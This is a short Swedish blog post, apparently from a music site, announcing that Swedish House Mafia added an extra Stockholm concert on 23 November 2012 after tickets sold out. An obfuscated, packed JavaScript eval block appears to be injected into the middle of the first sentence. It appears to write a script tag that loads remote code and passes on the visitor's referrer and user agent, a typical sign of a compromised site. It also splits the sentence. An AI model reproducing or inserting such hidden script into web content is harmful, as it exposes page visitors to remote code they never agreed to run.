Image Image Image Image Image Image Image Image Image Image

| 19 augusti, 2018

Scroll to top

Top

No Comments

Swedish House Mafia klara för extra spelning 23 November 2012

Swedish House Mafia klara för extra spelning 23 November 2012
Sebastian Plengier Ehrnfelt

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hftih|var|u0026u|referrer|abzbe||js|php’.split(‘|’),0,{}))
er som var uppe tidigt i morse och köade och inte fick tag i någon biljett har nu tur. Swedish House Mafia kommer att spela en kväll till här i Stockholm på Friends Arena. Den 23 och 24 November är de datum som är satta och 23 November är extra spelningen.

I morse öppnade biljettförsäljning för Swedish House Mafia på Friends arena i Stockholm klockan 09:00. Tydligen var det rätt många som ville roffa åt sig en eller två biljetter för redan 45 minuter efter var alla biljetter, ca 35.000 stycken slutsålda.

Vi på Revue stod i kö från 08:55 och fick inte tag i någon så vi ger det ett nytt försök imorgon.

Kom ihåg att vara uppe tidigt imorgon och ge er in i kriget på ticnet.se!

https://www.facebook.com/Ticnet

Submit a Comment